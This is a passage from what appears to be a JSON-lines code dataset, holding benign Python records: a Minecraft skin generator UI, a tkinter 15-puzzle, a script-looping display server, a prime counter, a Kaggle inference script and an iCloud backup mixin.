self.apply_sharpening_filter(model_output, self.sharpen_value, True)\n\n # reduce colors\n if self.reduce_colors:\n reduced_model_output = self.reduce_color_palette(model_output[:,:,:3]*255, self.number_of_colors)\n model_output = np.concatenate((reduced_model_output, model_output[:,:,3:]*255), axis=2).astype(np.uint8)\n self.skin_array = model_output\n else:\n self.skin_array = (model_output*255).astype(np.uint8)\n\n skin_data = (self.skin_array[:,:,:3] * alpha_mask).transpose(1, 0, 2)\n self.skin_surface = pygame.surfarray.make_surface(skin_data)\n self.skin_surface = pygame.transform.scale(self.skin_surface, (300, 300))\n\n self.skin_array[0,0,:3] = self.background_color # set background color\n self.skin_array[0,0,3] = 0\n\n rendered_skin = np.full((401,202,4), 255, dtype=np.uint8)\n rendered_skin[:,:,:3] = self.skin_array[self.skin_front_layout[:,:,0],self.skin_front_layout[:,:,1],:3]\n overlay_alpha = self.skin_array[self.skin_front_overlay_layout[:,:,0],self.skin_front_overlay_layout[:,:,1],3:]/255\n rendered_skin[:,:,:3] = rendered_skin[:,:,:3] * (1-overlay_alpha) + overlay_alpha * self.skin_array[self.skin_front_overlay_layout[:,:,0],self.skin_front_overlay_layout[:,:,1],:3]\n self.skin_render_front_surface = pygame.surfarray.make_surface(rendered_skin.transpose(1, 0, 2)[:,:,:3])\n self.skin_render_front_surface = pygame.transform.scale(self.skin_render_front_surface, (150, 300))\n \n rendered_skin[:,:,:3] = self.skin_array[self.skin_back_layout[:,:,0],self.skin_back_layout[:,:,1],:3]\n overlay_alpha = self.skin_array[self.skin_back_overlay_layout[:,:,0],self.skin_back_overlay_layout[:,:,1],3:]/255\n rendered_skin[:,:,:3] = rendered_skin[:,:,:3] * (1-overlay_alpha) + overlay_alpha * self.skin_array[self.skin_back_overlay_layout[:,:,0],self.skin_back_overlay_layout[:,:,1],:3]\n self.skin_render_back_surface = pygame.surfarray.make_surface(rendered_skin.transpose(1, 0, 2)[:,:,:3])\n self.skin_render_back_surface = pygame.transform.scale(self.skin_render_back_surface, (150, 300))\n\n def load_skin(self):\n file_path = askopenfilename(defaultextension=\".png\", filetypes=[(\"PNG Image\", \"*.png\"), (\"JPEG Image\", \"*.jpg\"), (\"All files\", \"*\")])\n if file_path != \"\":\n try:\n img = np.array(Image.open(file_path).convert(\"RGBA\")).transpose(2,0,1).astype(np.float32)/255\n\n # if classic skin -> convert to 64x64 skin\n if img.shape[1] == 32 and img.shape[2] == 64:\n #convert classic skin to normal 64x64 skin\n new_img = np.zeros((4,64,64), dtype=np.float32)\n new_img[:,:32,:] = img\n new_img[:,48:,16:32] = new_img[:,16:32,:16]\n new_img[:,48:,32:48] = new_img[:,16:32,40:56]\n img = new_img\n\n if not (img.shape[1] == 64 and img.shape[2] == 64):\n print(\"Error: wrong skin size. image must be 64x64 or 32x64 pixels\") \n return\n \n new_inputs = self.model_encode.run(None, {\"input\": img.reshape(1,4,64,64)})[0]\n if self.move_sliders:\n raw_slider_values = np.dot(new_inputs[0] - self.pca_mean, self.pca_components.T)\n self.slider_move_target = (1-(raw_slider_values/(self.pca_std * self.slider_range_factor)))/2\n self.slider_move_target = np.clip(self.slider_move_target, 0, 1)\n self.slider_move_speed = (self.slider_move_target - self.slider_values) / self.slider_move_frames\n self.update_sliders = True\n else:\n self.input_values = new_inputs\n self.update_sliders_from_inputs()\n self.run_model()\n except:\n print(\"Error: couldn't load skin\")\n\n def save_skin(self):\n file_path = asksaveasfilename(defaultextension=\".png\", filetypes=[(\"PNG Image\", \"*.png\"), (\"JPEG Image\", \"*.jpg\"), (\"All files\", \"*\")])\n if file_path != \"\":\n try:\n Image.fromarray(self.skin_array).save(file_path)\n except:\n print(\"Error: couldn't save skin as image\")\n\n def update_inputs_from_sliders(self):\n pca_input = (1-(self.slider_values*2)) * self.pca_std * self.slider_range_factor\n self.input_values[0] = np.dot(pca_input, self.pca_components) + self.pca_mean\n\n def update_sliders_from_inputs(self):\n raw_slider_values = np.dot(self.input_values[0] - self.pca_mean, self.pca_components.T)\n self.slider_values = (1-(raw_slider_values/(self.pca_std * self.slider_range_factor)))/2\n self.slider_values = np.clip(self.slider_values, 0, 1)\n\n def randomize_slider_values(self):\n if self.move_sliders:\n self.slider_move_target = np.clip((np.random.normal(0, 1, (256))/6) + 0.5, 0, 1)\n self.slider_move_speed = (self.slider_move_target - self.slider_values) / self.slider_move_frames\n self.update_sliders = True\n else:\n self.slider_values = (1-(np.random.normal(0, self.pca_std, 256)/(self.pca_std * self.slider_range_factor)))/2\n self.slider_values = np.clip(self.slider_values, 0, 1)\n self.update_inputs_from_sliders()\n\n def reset_slider_values(self):\n if self.move_sliders:\n self.slider_move_target = np.full((256), 0.5, dtype=np.float32)\n self.slider_move_speed = (self.slider_move_target - self.slider_values) / self.slider_move_frames\n self.update_sliders = True\n else:\n self.slider_values = np.full((256), 0.5, dtype=np.float32)\n self.update_inputs_from_sliders()\n\n def update(self):\n\n # feed output-skin back through model\n if self.keys_pressed[pygame.K_h]:\n self.input_values = self.model_encode.run(None, {\"input\": [(self.skin_array.transpose(2,0,1)/255).astype(np.float32)]})[0]\n self.update_sliders_from_inputs()\n self.update_inputs_from_sliders()\n self.run_model()\n self.update_sliders = False\n \n # move sliders\n if self.move_sliders and self.update_sliders:\n #move sliders with constant speed\n self.slider_values += np.where(self.slider_values != self.slider_move_target, self.slider_move_speed, 0)\n self.slider_values = np.where(abs(self.slider_values - self.slider_move_target) <= self.slider_move_speed, self.slider_move_target, self.slider_values)\n \n if np.sum(np.abs(self.slider_values - self.slider_move_target)) < 0.1:\n self.slider_values = self.slider_move_target\n self.update_sliders = False\n \n # self.slider_values += (self.slider_move_target - self.slider_values) * self.slider_move_speed\n self.update_inputs_from_sliders()\n self.run_model()\n\n \n\n def run(self):\n while self.running:\n self.mouse_x, self.mouse_y = pygame.mouse.get_pos()\n\n # Handle events\n self.keys_pressed = pygame.key.get_pressed()\n event_list = pygame.event.get()\n for event in event_list:\n if event.type == pygame.QUIT:\n self.running = False\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_r:\n self.randomize_slider_values()\n self.run_model()\n elif event.key == pygame.K_0:\n self.reset_slider_values()\n self.run_model()\n elif event.key == pygame.K_s:\n self.save_skin()\n elif event.key == pygame.K_l:\n self.load_skin()\n elif event.key == pygame.K_m:\n self.move_sliders = not self.move_sliders\n if not self.move_sliders:\n self.update_sliders = False\n self.text_move_sliders = self.font.render(\"M - Move sliders\", True, (255,255,255) if self.move_sliders else (100,100,100))\n elif event.key == pygame.K_o:\n self.overlay = not self.overlay\n self.text_toggle_overlay = self.font.render(\"O - Toggle overlay\", True, (255,255,255) if self.overlay else (100,100,100))\n self.run_model()\n elif event.key == pygame.K_x:\n self.sharpen_skin = not self.sharpen_skin\n self.text_sharpen = self.font.render(\"X - Sharpen\", True, (255,255,255) if self.sharpen_skin else (100,100,100))\n self.text_sharpen_value = self.font.render(\"Sharpen value: \" + str(round(self.sharpen_value,1)), True, (255,255,255) if self.sharpen_skin else (100,100,100))\n self.run_model()\n elif event.key == pygame.K_c:\n self.reduce_colors = not self.reduce_colors\n self.text_reduce_colors = self.font.render(\"C - Reduce colors\", True, (255,255,255) if self.reduce_colors else (100,100,100))\n self.text_number_of_colors = self.font.render(\"Number of colors: \" + str(self.number_of_colors), True, (255,255,255) if self.reduce_colors else (100,100,100))\n self.run_model()\n \n elif event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1: # left mouse button\n self.mouse_pressed_slider_i = self.mouse_over_slider_i\n\n # mouse over pca sliders\n if self.mouse_pressed_slider_i != None:\n if self.update_sliders:\n self.mouse_pressed_slider_i = None\n else:\n self.slider_values[self.mouse_pressed_slider_i] = np.clip((self.mouse_y - self.slider_y - self.slider_knob_height/2) / (self.slider_height-self.slider_knob_height), 0, 1)\n self.update_inputs_from_sliders()\n self.run_model()\n\n # mouse over sharpen slider\n if point_vs_rect(self.mouse_x, self.mouse_y, self.sharpen_slider_x, self.sharpen_slider_y, self.sharpen_slider_width, self.sharpen_slider_height):\n self.mouse_pressed_sharpen_slider = True\n self.sharpen_value = np.clip(((self.mouse_x - self.sharpen_slider_x - self.sharpen_slider_knob_width/2) / (self.sharpen_slider_width-self.sharpen_slider_knob_width)),0,1)**2 * (self.sharpen_max-self.sharpen_min) + self.sharpen_min\n self.text_sharpen_value = self.font.render(\"Sharpen value: \" + str(round(self.sharpen_value,1)), True, (255,255,255) if self.sharpen_skin else (100,100,100))\n self.run_model()\n \n # mouse over number of colors slider\n if point_vs_rect(self.mouse_x, self.mouse_y, self.number_colors_slider_x, self.number_colors_slider_y, self.number_colors_slider_width, self.number_colors_slider_height):\n self.mouse_pressed_colors_slider = True\n self.number_of_colors = int(np.clip(((self.mouse_x - self.number_colors_slider_x - self.number_colors_slider_knob_width/2) / (self.number_colors_slider_width-self.number_colors_slider_knob_width)),0,1)**2 * (self.number_colors_max-self.number_colors_min) + self.number_colors_min)\n self.text_number_of_colors = self.font.render(\"Number of colors: \" + str(self.number_of_colors), True, (255,255,255) if self.reduce_colors else (100,100,100))\n self.run_model()\n\n # mouse over slider range slider\n if point_vs_rect(self.mouse_x, self.mouse_y, self.slider_range_x, self.slider_range_y, self.slider_range_width, self.slider_range_height):\n self.mouse_pressed_range_slider = True\n self.slider_range_factor = np.clip(((self.mouse_x - self.slider_range_x - self.slider_range_knob_width/2) / (self.slider_range_width-self.slider_range_knob_width)),0,1) * (self.slider_range_max-self.slider_range_min) + self.slider_range_min\n self.text_slider_range = self.font.render(\"Slider range: \" + str(round(self.slider_range_factor,2)), True, (255,255,255))\n self.update_inputs_from_sliders()\n self.run_model()\n \n\n elif event.type == pygame.MOUSEBUTTONUP:\n if event.button == 1: # left mouse button\n self.mouse_pressed_slider_i = None\n self.mouse_pressed_colors_slider = False\n self.mouse_pressed_sharpen_slider = False\n self.mouse_pressed_range_slider = False\n\n elif event.type == pygame.MOUSEMOTION:\n if point_vs_rect(self.mouse_x, self.mouse_y, self.slider_x-self.slider_spacing/2, self.slider_y, (self.slider_width+self.slider_spacing)*self.number_of_sliders_shown, self.slider_height):\n if self.update_sliders:\n self.mouse_pressed_slider_i = None\n else:\n before_i = self.mouse_over_slider_i\n self.mouse_over_slider_i = self.slider_offset + int((self.mouse_x - self.slider_x + self.slider_spacing/2) / (self.slider_width + self.slider_spacing))\n if self.mouse_over_slider_i != before_i:\n i = self.mouse_over_slider_i if self.mouse_pressed_slider_i == None else self.mouse_pressed_slider_i\n self.text_slider_description = self.font.render(f\"{i+1}: \"+self.slider_descriptions[i], True, (255,255,255))\n else:\n self.mouse_over_slider_i = None\n\n if self.mouse_pressed_slider_i != None:\n self.slider_values[self.mouse_pressed_slider_i] = np.clip((self.mouse_y - self.slider_y - self.slider_knob_height/2) / (self.slider_height-self.slider_knob_height), 0, 1)\n self.update_inputs_from_sliders()\n self.run_model()\n\n if self.mouse_pressed_sharpen_slider:\n self.sharpen_value = np.clip(((self.mouse_x - self.sharpen_slider_x - self.sharpen_slider_knob_width/2) / (self.sharpen_slider_width-self.sharpen_slider_knob_width)),0,1)**2 * (self.sharpen_max-self.sharpen_min) + self.sharpen_min\n if abs(self.sharpen_value - self.sharpen_value_default) < 0.5:\n self.sharpen_value = self.sharpen_value_default\n self.text_sharpen_value = self.font.render(\"Sharpen value: \" + str(round(self.sharpen_value,1)), True, (255,255,255) if self.sharpen_skin else (100,100,100))\n self.run_model()\n\n if self.mouse_pressed_colors_slider:\n self.number_of_colors = int(np.clip(((self.mouse_x - self.number_colors_slider_x - self.number_colors_slider_knob_width/2) / (self.number_colors_slider_width-self.number_colors_slider_knob_width)),0,1)**2 * (self.number_colors_max-self.number_colors_min) + self.number_colors_min)\n self.text_number_of_colors = self.font.render(\"Number of colors: \" + str(self.number_of_colors), True, (255,255,255) if self.reduce_colors else (100,100,100))\n self.run_model()\n\n if self.mouse_pressed_range_slider:\n self.slider_range_factor = np.clip(((self.mouse_x - self.slider_range_x - self.slider_range_knob_width/2) / (self.slider_range_width-self.slider_range_knob_width)),0,1) * (self.slider_range_max-self.slider_range_min) + self.slider_range_min\n if abs(self.slider_range_factor - self.slider_range_default) < 0.3:\n self.slider_range_factor = self.slider_range_default\n self.text_slider_range = self.font.render(\"Slider range: \" + str(round(self.slider_range_factor,2)), True, (255,255,255))\n self.update_inputs_from_sliders()\n self.run_model()\n\n elif event.type == pygame.MOUSEWHEEL:\n self.slider_offset = np.clip(self.slider_offset - event.y*self.slider_scroll_speed, 0, self.number_of_sliders-self.number_of_sliders_shown)\n\n\n self.update()\n \n\n if pygame.display.get_active():\n self.window.fill(self.background_color)\n\n # draw skin\n self.window.blit(self.skin_surface, (10, 10))\n self.window.blit(self.skin_render_front_surface, (320, 10))\n self.window.blit(self.skin_render_back_surface, (480, 10))\n\n # draw pca sliders\n for slider_i in range(self.slider_offset, self.slider_offset+self.number_of_sliders_shown):\n slider_x = self.slider_x + (self.slider_width + self.slider_spacing) * (slider_i-self.slider_offset)\n slider_color = self.slider_colors[slider_i]\n pygame.draw.line(self.window, (slider_color[0]/2, slider_color[1]/2, slider_color[2]/2), \n (slider_x+self.slider_width/2, self.slider_y), \n (slider_x+self.slider_width/2, self.slider_y + self.slider_height))\n pygame.draw.line(self.window, (slider_color[0]/2, slider_color[1]/2, slider_color[2]/2),\n (slider_x, self.slider_y+self.slider_height/2),\n (slider_x+self.slider_width, self.slider_y+self.slider_height/2))\n pygame.draw.rect(self.window, slider_color, pygame.Rect(slider_x, self.slider_y + self.slider_values[slider_i]*(self.slider_height-self.slider_knob_height), self.slider_width, self.slider_knob_height))\n \n slider_x = self.slider_x + self.slider_width/2 + (self.slider_width + self.slider_spacing) * (slider_i-self.slider_offset) - self.slider_numbers[slider_i].get_width()/2\n self.window.blit(self.slider_numbers[slider_i], (slider_x, self.slider_y + self.slider_height + 5))\n\n # draw texts\n self.window.blit(self.text_reset_slider, (self.width-200, 20))\n self.window.blit(self.text_randomize_slider, (self.width-200, 40))\n self.window.blit(self.text_save_skin, (self.width-200, 60))\n self.window.blit(self.text_load_skin, (self.width-200, 80))\n self.window.blit(self.text_converge, (self.width-200, 100))\n self.window.blit(self.text_move_sliders, (self.width-200, 120))\n self.window.blit(self.text_toggle_overlay, (self.width-200, 140))\n self.window.blit(self.text_sharpen, (self.width-200, self.sharpen_slider_y-22))\n self.window.blit(self.text_sharpen_value, (self.width-200, self.sharpen_slider_y+20))\n self.window.blit(self.text_reduce_colors, (self.width-200, self.number_colors_slider_y-22))\n self.window.blit(self.text_number_of_colors, (self.width-200, self.number_colors_slider_y+20))\n self.window.blit(self.text_slider_range, (self.width-200, self.slider_range_y-22))\n\n if self.mouse_over_slider_i != None or self.mouse_pressed_slider_i != None:\n self.window.blit(self.text_slider_description, (10, 360))\n\n # draw number of colors slider\n pygame.draw.line(self.window, (255,255,255) if self.reduce_colors else (100,100,100),\n (self.number_colors_slider_x + ((self.number_of_colors_default-self.number_colors_min)/(self.number_colors_max-self.number_colors_min))**0.5 * self.number_colors_slider_width, self.number_colors_slider_y),\n (self.number_colors_slider_x + ((self.number_of_colors_default-self.number_colors_min)/(self.number_colors_max-self.number_colors_min))**0.5 * self.number_colors_slider_width, self.number_colors_slider_y + self.number_colors_slider_height))\n pygame.draw.line(self.window, (255,255,255) if self.reduce_colors else (100,100,100),\n (self.number_colors_slider_x, self.number_colors_slider_y+self.number_colors_slider_height/2),\n (self.number_colors_slider_x+self.number_colors_slider_width, self.number_colors_slider_y+self.number_colors_slider_height/2))\n pygame.draw.rect(self.window, (255,255,255) if self.reduce_colors else (100,100,100), pygame.Rect(self.number_colors_slider_x + ((self.number_of_colors-self.number_colors_min)/(self.number_colors_max-self.number_colors_min))**0.5 *(self.number_colors_slider_width-self.number_colors_slider_knob_width), self.number_colors_slider_y, self.number_colors_slider_knob_width, self.number_colors_slider_height))\n\n # draw sharpen slider\n pygame.draw.line(self.window, (255,255,255) if self.sharpen_skin else (100,100,100),\n (self.sharpen_slider_x + ((self.sharpen_value_default-self.sharpen_min)/(self.sharpen_max-self.sharpen_min))**0.5 * self.sharpen_slider_width, self.sharpen_slider_y),\n (self.sharpen_slider_x + ((self.sharpen_value_default-self.sharpen_min)/(self.sharpen_max-self.sharpen_min))**0.5 * self.sharpen_slider_width, self.sharpen_slider_y + self.sharpen_slider_height))\n pygame.draw.line(self.window, (255,255,255) if self.sharpen_skin else (100,100,100),\n (self.sharpen_slider_x, self.sharpen_slider_y+self.sharpen_slider_height/2),\n (self.sharpen_slider_x+self.sharpen_slider_width, self.sharpen_slider_y+self.sharpen_slider_height/2))\n pygame.draw.rect(self.window, (255,255,255) if self.sharpen_skin else (100,100,100), pygame.Rect(int(self.sharpen_slider_x + ((self.sharpen_value-self.sharpen_min)/(self.sharpen_max-self.sharpen_min))**0.5 * (self.sharpen_slider_width-self.sharpen_slider_knob_width)), self.sharpen_slider_y, self.sharpen_slider_knob_width, self.sharpen_slider_height))\n\n # draw slider range slider\n pygame.draw.line(self.window, (255,255,255),\n (self.slider_range_x + ((self.slider_range_default-self.slider_range_min)/(self.slider_range_max-self.slider_range_min)) * self.slider_range_width, self.slider_range_y),\n (self.slider_range_x + ((self.slider_range_default-self.slider_range_min)/(self.slider_range_max-self.slider_range_min)) * self.slider_range_width, self.slider_range_y + self.slider_range_height))\n pygame.draw.line(self.window, (255,255,255),\n (self.slider_range_x, self.slider_range_y+self.slider_range_height/2),\n (self.slider_range_x+self.slider_range_width, self.slider_range_y+self.slider_range_height/2))\n pygame.draw.rect(self.window, (255,255,255), pygame.Rect(int(self.slider_range_x + ((self.slider_range_factor-self.slider_range_min)/(self.slider_range_max-self.slider_range_min)) * (self.slider_range_width-self.slider_range_knob_width)), self.slider_range_y, self.slider_range_knob_width, self.slider_range_height))\n\n pygame.display.flip()\n self.clock.tick(40)\n\n pygame.quit()\n\n\nif __name__ == \"__main__\":\n app = App()\n app.run()\n","repo_name":"BirnB4um/MC_Skin_Generator","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":32422,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"5641971588","text":"import tkinter as tk\nimport tkinter.messagebox as msg\nimport sys, random\n\n# 隣接リス��\nadjacent = (\n (1, 4), # 0\n (0, 2, 5), # 1\n (1, 3, 6), # 2\n (2, 7), # 3\n (0, 5, 8), # 4\n (1, 4, 6, 9), # 5\n (2, 5, 7, 10), # 6\n (3, 6, 11), # 7\n (4, 9, 12), # 8\n (5, 8, 10, 13), # 9\n (6, 9, 11, 14), # 10\n (7, 10, 15), # 11\n (8, 13), # 12\n (9, 12, 14), # 13\n (10, 13, 15), # 14\n (11, 14) # 15\n)\n\n# 駒の色\npiece_color = (\n None,\n 'deep sky blue', \n 'sky blue',\n 'light sky blue',\n 'gold2',\n 'deep pink',\n 'hot pink', \n 'pink', \n 'gold3',\n 'sea green',\n 'medium sea green',\n 'light sea green',\n 'gold4',\n 'dark salmon', \n 'salmon', \n 'light salmon'\n)\n\n# メインウィンドウ\nroot = tk.Tk()\nroot.title('15 Puzzle')\n\n# グローバル変数\nlevel = tk.IntVar() # Easy = 0, Normal = 1, Hard = 2\nlevel.set(0)\nbuff = tk.StringVar() # ラベルのバッファ\nbuff.set(\"\")\n\nmoves = 0 # 手数\ngameflag = False # ゲーム中ならば True\n\nmin_moves = [999, 999, 999]\nshuffle_count = [25, 50, 75]\n\n# 手数表示用ラベル\nla = tk.Label(textvariable = buff, font = ('', 14))\nla.pack()\n\n# 盤面を表示するためのキャンバス\nc0 = tk.Canvas(root, width = 220, height = 220, bg = 'brown4')\nc0.create_rectangle(9, 9, 210, 210, fill = 'black')\nc0.pack()\n\n# 盤面\nboard = [ 1, 2, 3, 4,\n 5, 6, 7, 8,\n 9, 10, 11, 12,\n 13, 14, 15, 0]\n\n# 駒\npiece = [None]\n\n# 手数の表示\ndef show_moves(m):\n buff.set('手数: {:3d} 記録: {:3d} '.format(m, min_moves[level.get()]))\n\n# 空き場所を探す\ndef search_space(z):\n for s in adjacent[z]:\n if board[s] == 0: return s\n\n# 駒の移動\ndef move_piece(n):\n global moves, gameflag\n if not gameflag: return\n z = board.index(n)\n x = z % 4\n y = z // 4\n s = search_space(z)\n if s is not None:\n x1 = s % 4\n y1 = s // 4\n board[s] = n\n board[z] = 0\n c0.coords(piece[n], x1 * 50 + 35, y1 * 50 + 35)\n moves += 1\n show_moves(moves)\n if board == [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,0]:\n msg.showinfo(message = 'おめでとうございます')\n if min_moves[level.get()] > moves:\n min_moves[level.get()] = moves\n show_moves(moves)\n gameflag = False\n\n# ゲームの開始\ndef start_game():\n global moves, gameflag\n move = [0]\n moves = 0\n gameflag = True\n show_moves(moves)\n for i in range(15):\n board[i] = i + 1\n board[15] = 0\n s = 15\n c = 0\n while c < shuffle_count[level.get()]:\n d = random.choice(adjacent[s])\n p = board[d]\n if p == move[-1]: continue\n board[s] = p\n board[d] = 0\n move.append(p)\n s = d\n c += 1\n for i in range(0, 16):\n if board[i] == 0: continue\n x = i % 4\n y = i // 4\n c0.coords(piece[board[i]], x * 50 + 35, y * 50 + 35)\n\n#\n# 盤面\n#\n\n# コールバック関数を生成する\ndef make_callback(n):\n return lambda _: move_piece(n)\n\n# 駒の生成\nfor i in range(1, 16):\n x = (i - 1) % 4\n y = (i - 1) // 4\n la = tk.Label(root, text = '{}'.format(i), bg = piece_color[i], fg = 'white', font = ('', 24))\n la.bind('', make_callback(i))\n id = c0.create_window(x * 50 + 35, y * 50 + 35, window = la, width = 48, height = 48)\n piece.append(id)\n\n#\nshow_moves(0)\n\n#\n# メニューバー\n#\nmenubar = tk.Menu(root)\nroot.configure(menu = menubar)\n\ngames = tk.Menu(menubar, tearoff = False)\nlevels = tk.Menu(menubar, tearoff = False)\nmenubar.add_cascade(label=\"Games\", underline = 0, menu=games)\nmenubar.add_cascade(label=\"Level\", underline = 0, menu=levels)\n\n# Games\ngames.add_command(label = \"Start\", underline = 0, command = start_game)\ngames.add_separator\ngames.add_command(label = \"exit\", underline = 0, command = sys.exit)\n\n# Labels\nlevels.add_radiobutton(label = 'Easy', variable = level, value = 0, command = start_game)\nlevels.add_radiobutton(label = 'Normal', variable = level, value = 1, command = start_game)\nlevels.add_radiobutton(label = 'Hard', variable = level, value = 2, command = start_game)\n\nroot.mainloop()\n","repo_name":"uminekohouse/15pazzle","sub_path":"tmp1.py","file_name":"tmp1.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"15437203165","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport config\n\nimport os\nimport subprocess\nimport time\nimport pathlib\nimport pixelit\n\nclass AppLoop:\n def __init__(self):\n self.applist=[]\n\n def loadApps(self):\n currentpath=pathlib.Path(__file__).parent.resolve()\n #print(\"[DEBUG]\",str(currentpath))\n for file in os.listdir(str(currentpath)+\"/active-apps\"):\n if not file.endswith(\"config.py\"):\n if not file.endswith(\"pixelit.py\"):\n if file.endswith(\".py\"):\n #print(file)\n tmp=App(file,str(currentpath)+\"/active-apps/\"+file)\n self.add(tmp)\n\n def getApplist(self):\n return self.applist\n\n def printApps(self):\n print(\"[INFO] SERVER found\",len(self.applist),\"apps:\")\n for i in self.applist:\n print(\"[INFO] SERVER\", i.getAppname(),\": in\",i.getPath())\n\n def add(self, newApp):\n self.applist.append(newApp)\n\nclass App:\n def __init__(self,appname,path):\n self.appname=appname\n self.path=path\n\n def getAppname(self):\n return (self.appname)\n \n def getPath(self):\n return (self.path)\n \ndef text(mytext):\n print(\"\\n===========================\")\n print(mytext)\n print(\"===========================\\n\")\n\nif __name__ == \"__main__\":\n\n text(\"WELCOME TO PIXELIT SERVER\")\n\n appLoop=AppLoop()\n appLoop.loadApps()\n print(\"[INFO] SERVER found these apps:\")\n appLoop.printApps()\n\n text(\"SERVER Apploop starts now!\")\n \n while True:\n for i in appLoop.getApplist():\n subprocess.call(i.getPath()) #calling individual .py scripts\n print(\"\\n Advancing to next app \\n\")\n\n","repo_name":"dassystem/pixelit-server","sub_path":"pixelit-server.py","file_name":"pixelit-server.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"9882476828","text":"\nn = int(input())\nfor i in range(n):\n t = map(int, input().split(' '))\n x = list(t)\n \n counter = 0\n for j in range(x[0],x[1]):\n is_prime = True\n for k in range(2,j):\n if j%k == 0:\n is_prime = False \n if(is_prime):\n counter+=1 \n print(counter) ","repo_name":"dimiksonkha/problem-solving","sub_path":"easy_problems/prime_number.py","file_name":"prime_number.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"34392126691","text":"import os\nimport joblib\nimport pandas as pd\n\nfrom data import load_data, transform\nfrom utils import seed_everything\nfrom env import *\nimport time\n\nif __name__ == \"__main__\":\n seed_everything(42)\n model = joblib.load(\"checkpoints/day4/cv_0.79796.pkl\")\n\n start = time.time()\n\n X, _ = load_data(\n X_path=os.path.join(BASE_DIR, \"data/test.parquet\"),\n y_path=None,\n )\n X, _ = transform(X, None)\n # X = X.to_pandas()\n print(f\"[{time.time() - start}] load data complete\")\n\n start = time.time()\n y_pred = model.predict(X)\n print(f\"[{time.time() - start}] predict complete\")\n print(y_pred.shape)\n\n start = time.time()\n submission = pd.read_csv(os.path.join(BASE_DIR, \"data/sample_submission.csv\"))\n submission[\"cust_ID\"] = (\n submission[\"customer_ID\"].apply(lambda x: int(x[-16:], 16)).astype(\"int64\")\n )\n submission[[\"customer_ID\", \"cust_ID\"]].merge(\n pd.DataFrame(y_pred, columns=[\"prediction\"], index=X.index),\n left_on=\"cust_ID\",\n right_index=True,\n how=\"left\",\n )[[\"customer_ID\", \"prediction\"]].to_csv(\"submission.csv\", index=False)\n print(f\"[{time.time() - start}] submission complete\")","repo_name":"DevKor-Team/American-Express-Default-Prediction","sub_path":"onground/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"17407197855","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 10 10:25:50 2022\n\n@author: jpbakken\n\"\"\"\nfrom mixins.layout import EditFieldDialog\nfrom mixins.layout import iCloudCredentialsDialog\n\nimport json\n\nfrom kivymd.uix.dialog import MDDialog\nfrom kivymd.uix.button import MDFlatButton\n\nfrom pyicloud import PyiCloudService\nimport threading\nimport os\n\n# =============================================================================\n# icloud drive functions\n# =============================================================================\n\n\nclass Backups():\n icloud = None\n icloud_action = None\n\n\n def project_backup(self):\n '''\n authenticate and process backup in a thread\n --go through 2factor authenticate if needed\n '''\n self.icloud_action = 'backup'\n self.icloud_thread_start(self.icloud_auth)\n \n # if an untrusted session is returned, go through 2f auth\n if self.icloud:\n if not self.icloud.is_trusted_session:\n self.dialog_icloud_auth()\n\n\n def project_del_local_backup(self,):\n '''\n keep only number of backups specified in config settings\n '''\n files = os.listdir(self.wk_project_backup_dir)\n backups = []\n for f in files:\n if f.split('.')[-1] == 'zip':\n backups.append(f)\n \n \n backups.sort(reverse=True)\n \n for idx, backup in enumerate(backups):\n if idx >= int(self.backups_local):\n os.remove(os.path.join(self.wk_project_backup_dir,\n backup))\n\n\n def project_del_icloud_backup(self):\n '''\n keep only number of backups specified in config settings\n '''\n files = self.icloud.drive[self.app_name][self.wk_project_name].dir()\n backups = []\n for f in files:\n if f.split('.')[-1] == 'zip':\n backups.append(f)\n \n backups.sort(reverse=True)\n \n for idx, backup in enumerate(backups):\n if idx >= int(self.backups_icloud):\n self.icloud.drive[self.app_name]\\\n [self.wk_project_name][backup].delete()\n\n\n def icloud_thread_start(self,target):\n '''\n '''\n self.icloud_thread = threading.Thread(target=target)\n self.icloud_thread.start()\n self.icloud_thread.join()\n\n\n def icloud_read(self):\n '''\n '''\n cookie_directory = os.path.join(self.data_dir,'_cookies') \n\n # create/refresh the connection to icloud\n self.icloud = PyiCloudService(self.apple_id,\n self.apple_password,\n cookie_directory=cookie_directory,\n )\n \n def icloud_auth(self):\n '''\n start icloud service with username and password\n \n return to do 2 factor authentication if session is untrusted\n \n if authenticated, process the icloud action\n '''\n \n self.icloud_read()\n \n # not trusted, break the thread and go through auth code steps\n if not self.icloud.is_trusted_session:\n return\n \n # create the app folder if needed\n if not self.app_name in self.icloud.drive.dir():\n self.icloud.drive.mkdir(self.app_name) \n self.icloud_read()\n\n # process the icloud action\n else:\n if self.icloud_action == 'backup':\n self.icloud_backup()\n\n\n def dialog_icloud_auth(self):\n '''\n popup dialog used to enter authorization code\n '''\n self.edit_field_name = 'Authentication Code'\n self.edit_field_text = ''\n\n self.icloud_auth_dialog = MDDialog(\n title='Enter Code',\n type=\"custom\",\n pos_hint = {'center_x': .5, 'top': .9},\n content_cls=EditFieldDialog(),\n buttons=[\n MDFlatButton(\n text=\"Cancel\",\n on_release=self.dialog_icloud_auth_dismiss),\n MDFlatButton(\n text=\"Save\",\n on_release=self.dialog_icloud_2f)])\n \n self.icloud_auth_dialog.open()\n\n\n def dialog_icloud_login(self):\n '''\n popup dialog used to save username and password\n '''\n self.edit_field_name = 'iCloud Authentication'\n self.edit_field_text = ''\n \n\n self.icloud_login_dialog = MDDialog(\n title='Log in with your Apple Id and password',\n type=\"custom\",\n pos_hint = {'center_x': .5, 'top': .9},\n content_cls=iCloudCredentialsDialog(),\n buttons=[\n MDFlatButton(\n text=\"Cancel\",\n 